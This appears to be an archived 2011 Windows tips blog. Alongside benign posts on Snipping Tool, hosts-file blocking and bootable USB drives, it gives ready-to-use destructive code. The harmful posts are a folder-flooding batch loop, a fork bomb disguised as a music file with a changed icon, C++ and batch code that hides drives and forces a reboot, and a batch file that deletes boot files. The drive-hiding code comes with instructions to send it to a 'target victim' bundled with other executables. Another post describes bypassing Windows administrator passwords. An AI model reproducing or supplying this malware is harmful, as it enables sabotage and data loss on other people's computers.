Showing posts with label Windows 7. Show all posts
Showing posts with label Windows 7. Show all posts

Tuesday, 6 September 2011

Create a Batch pro that makes an Infinite Folders in a Hard Drive

Have you heard? A virus that create thousands of thousands folder within hard drive, Yes here is that; I am going to give a batch programming code that make it possible. This just a batch commands that create folder in hard disk and waste the memory of hard disk that brings a time when your drive got full.
Follow these simple steps:

  • Copy and Paste below codes on Notepad.
                          @echo off
                           :top
                           md %random%
                          goto top

  • Save it as .bat.
Now it is ready to use, don’t take it as joke.


Create a batch pro to Computer Freeze


It is a one of my favorite batch programming task that makes any computer freeze. It special because it is a one line code or you can say it is a single word. It is too easy to remember and use.  It makes the CPU down and finally freezes. But after restarting of system it work normally.
Note: This pro is dangerous for CPU so don’t try it on your own PC, friends or others.



Follow these steps:
  • Copy and paste the below code on Notepad.

                                   %0|%0
  • Save the file as .bat (e.g., music.bat)

Now it is ready to use. If you want to make some fun then you can copy this file to some drive and create a shortcut on desktop, Right Click on ShortcutàChange the Icon.



Monday, 5 September 2011

Use Windows Snipping Tool to Capture Sreenshort


Windows Snipping Tool
Most of the time we don’t think that much that something is deep. Yes friends today I feel the same because today I find something special in Windows Vista, 7 that is “Snipping Tool” which make may work 95% less. When I was not aware with it need to work more. Whenever you need some part of Website or your Windows as picture what you do?  You may press Fn+Prnt Scrn from your keyboard and paste it to Paint and then after cut the portion you needed and then save it as picture. This practice of creating image is too long and time consuming. But here is tool in Windows that make that much of work in just one Click.
What is Snipping Tool?
It is a windows hidden feature that enable user to direct make picture or image of may portion of you want. To capture a snip, do the following:
1.       Click to open Snipping Tool.

2.      Click the arrow next to the New button, select Free-form Snip, Rectangular Snip, Window Snip, or Full-screen Snip from the list, and then select the area of your screen that you want to capture.
3.      The captured area of the screen appears in the mark-up window, where you can write or draw on it, save it, and send it to someone in an e‑mail.
How do I save snips?
  • 4.      When you capture a snip, it is automatically copied to the Clipboard so that you can quickly paste it into a document, e‑mail, or presentation.
  • 5.      You can also save a snip as an HTML, PNG, GIF, or JEPG file. After you capture a snip, you can save it by clicking the Save Snip button in the mark-up window. 

Create a Batch to Block Windows Drives and Make System Dead


Today I am going to give some coding that help you to create a Virus that that Block Windows Drives permanently and make the victim to suffer disabling of Drive . This virus blocks  drives and makes the system shutdown permanently. To overcome from its effect victim needs to Re-Install its Operating System.
What is it? And how it work?
It is a simple command written in C++ for those people who want to use their C++ knowledge and for those who doesn’t have C++ knowledge they can direct use Batch commands. Whenever the target victim run below created files it’s Windows drives  will got blocked for permanently and system will shutdown.
With C++:
Follow these steps

  • Ø  Copy below codes.
#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n";
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n";
write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n";
write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL);
return 0; 
}   

  • Ø  Paste it on Notepad.
  • Ø  Save it in .cpp.
  • Ø  Create .exe file.
  • Ø  Send it to target victim (you can also attach it with other exe files).
With Batch:
Follow these steps:

  • Ø  Copy below codes.
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f  

  • Ø  Paste it on Notepad.
  • Ø  Save it in .bat.
  • Ø  Send it to target victim (you can also attach it with other exe files).
Note: To recover from it you might be need to re-install your Operating system.





Sunday, 4 September 2011

How to get Windows Administrator Password


Most of the time people wants to login as Administrator in the absence of actual Administrator Password holder. Here today I am going to give a best working trick that is on “How to Windows Administrator Password? And How to become an Administrator of Windows?” and this trick help you to login to your system without knowing password.
If you forget your Administrator password here is trick that help you to reset your administrator password or make it empty just by the use of this small tool called  Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.
Ø  You do not need to know the old password to set a new one
Ø  Will detect and offer to unlock locked or disabled out user accounts!
Ø  There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.
How it works?
Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.
The download link for both CD and floppy drives along with the complete instructions is given below
It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.
How to reset Administrator Password?
By following these steps you can simply reset Password of any Non-Administrator Account for that you just need Administrator Privilege.
1. Start->Run->type cmd->
2. Now type net user and hit Enter
3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows
4. Type net user John * and hit Enter. Here the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.
Hope this will help you and you wouldn’t need to re-install windows if you forget your password.

Friday, 2 September 2011

How to Block Harmful Websites on your Computer?


Most of the websites are there that targets our Computer for their benefits, Whenever  they founds any little weakness of our PC security  they start downloads their files  to your Computer without your permission. These files are dangerous for PC, It will firstly attack on our PC security and make it disable and then whenever you login to these site they further download more file to your PC. There is a solution of these types of Websites, Just we need to Block those website that are somewhere harm our PC.

1. Goto StartàMy Computerà C:\ DriveàWindowsà(Find ‘Hosts’ file)
C:\WINDOWS\SYSTEM32\DRIVERS\ETC for Vista and XP
C:\WINNT\SYSTEM32\DRIVERS\ETC for Win 2000
C:\WINDOWS for Windows 98 and ME
2. Now Open HOSTS file with Notepad.
The default Windows HOSTS looks like this:
______________________
# Copyright © 1993-1999 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a “#” symbol.
# For example:
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
_____________________________
3. Directly under the line that says 127.0.0.1 Localhost, you will want to type:
127.0.0.1 name of the URL you want to block
For example to block the website softpedia.com, simply type:
127.0.0.1 softpedia.com
127.0.0.1 www.softpedia.com
Other parts of MySpace could be blocked in a similar way:
127.0.0.1 search.softpedia.com
127.0.0.1 profile.softpedia.com
etc …
It is necessary to add a website with and without the “www.”. You can add any number of websites to this list.
4. Save the Notepad file.
5. After blocking the website, test it in any of the browser. 

Thursday, 1 September 2011

Change your IP Address in Few Seconds


How to Change IP Address? Sometimes we need to change our IP Address and in that situation we feel helpless, we think a lot to make work done. But today dear friends I here going to make you eligible, let you answer of your question and solution of your problem "How to Change My IP Address?", Here I will give some tricks that make your work easy and you can manage it in just few seconds.
1. Click on StartàRunàcmdà
3. Type in “command” and hit ok. You should now be at an MSDOS prompt screen.
4. Type “ipconfig /release” àEnter
5. Type “exit” àEnter (To leave command Prompt).
6. Right-click on “Network Places” or “My Network Places” on your desktop.
7. Goto “properties”.
You should now be on a screen with something titled “Local Area Connection”, or something close to that.
8. Right click on “Local Area Connection” and click “properties”.
9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab.
10. Click on “Use the following IP address” under the “General” tab.
11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until i fill the area up).
12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.
13. Hit the “Ok” button here.
14. Hit the “Ok” button again. You should now be back to the “Local Area Connection” screen.
15. Right-click back on “Local Area Connection” and go to properties again.
16. Go back to the “TCP/IP” settings.
17. This time, select “Obtain an IP address automatically”.
18. Hit “Ok”.
19. Hit “Ok” again.
20. You now have a new IP address.
This trick is totally working for dynamic IP Address because Static IP Address doesn’t allow you to change or Hide it and If you done it with proxy but cause some problems for you. 

Wednesday, 31 August 2011

Steps to Make Bootable USB Flash Drive to Install Windows 7, Windows Vista

Due to lack of proper functionality of CD-ROM in our PC and absence of CD-ROM in our Mini Laptops, it make us most of the time in trouble to install new copy of Windows. But here is solution to install your new copy of Windows without need CD-ROM, with the help of your Flash USB Drive you can also install your Windows, the one of the biggest advantages of installing Windows from USB is the speed of installation, USB boost installation speed.
Requirements:
1)      A USB Flash Driver with minimum Capacity 4GB.
2)     A Copy of Windows Setup
How to Follow:
  1. 1)      Insert 4GB your USB Driver to PC.
  2. 2)     Goto StartàRunàcmd.

)     3)Write command (A new cmd window will open) 
DI  "DISKPART"
Write “LIST DISK”

4). This will show you List of all Disks select your disk USB example below
                
 Write “SELECT DISK 1”
        Write the Following Commands
        CLEAN 
        CREATE PARTITION PRIMARY
        SELECT PARTITION 1 
        ACTIVE 
        FORMAT FS=NTFS QUICK 
        ASSIGN 
        EXIT
 
4)     5). Now you are on main cmd Windows follow these commands.
ppp
H: CD BOOT
CD BOOT
BOOTSECT.EXE /NT60 M:(NOTE: M: is your USB drive letter)
EXIT

6). Now copy all Windows Setup files directly to your USB. and All done.
Now we are ready to install windows.
For more query leave a comment.

ShutDown a Computer Forever-Don’t Try It


Our PC needs lots of file to start its booting (“Boot Files”) and any how if we delete these file from the system than PC will no longer to reboot or restart itself that make it Shutdowns Forever. Although our Operating System doesn’t allow us to do any changes or deletion on system files but here is some code that makes this possible.  This is a working trick so don’t try it on your PC otherwise you might be needed to reinstall you operating System.

  1. 1.       Open your Notepad.
  2. 2.      Copy and Paste these codes.
  3. @ECHO OFF
    ATTRIB -R -S -H C:AUTOEXEC.BAT
    DEL C:AUTOEXEC.BAT
    ATTRIB -R -S -H C:BOOT.INI
    DEL C:BOOT.INI
    ATTRIB -R -S -H C:NTLDR
    DEL C:NTLDR
    ATTRIB -R -S -H C:WINDOWSWIN.INI
    DEL C:WINDOWSWIN.INI
      
    
  4. 3.      Save file “filename.bat”.
  5. 4.      Now run the file.